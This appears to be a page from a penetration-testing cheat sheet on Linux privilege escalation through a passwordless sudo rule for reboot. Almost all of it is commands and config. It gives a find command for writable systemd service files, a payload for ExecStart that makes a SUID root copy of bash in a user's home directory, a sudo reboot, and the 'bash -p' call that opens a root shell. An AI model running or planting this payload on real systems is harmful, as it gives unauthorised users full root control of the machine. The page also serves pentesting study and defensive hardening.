Sudo Reboot Privilege Escalation

Sudo reboot commands might be vulnerable to privilege escalation (PrivEsc).

Investigation

sudo -l

(ALL) NOPASSWD: /usr/sbin/reboot
Copied!

If we can execute "reboot" command as root, we can escalate to privileges.

Exploitation

1. Find Service Config Files Which Are Writable

We need to look for the system service config file which are writable.

find / -writable -name "*.service" 2>/dev/null

/etc/systemd/system/example.service
Copied!

2. Insert a Payload

If we find a writable file, we can inject a payload into Service.ExecStart.

# /etc/systemd/systm/example.service
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'

[Install]
WantedBy=multi-user.target
Copied!

3. Reboot and Get a Root Shell

Now reboot as root.

sudo /usr/sbin/reboot
Copied!

After the system rebooted, the command in the ExecStart will be executed. Now we should get a root shell by executing the copied bash command.

/home/<username>/bash -p

PreviousSudo Privilege Escalation by Overriding Shared Library NextSudo Screen Privilege Escalation

Last updated 1 year ago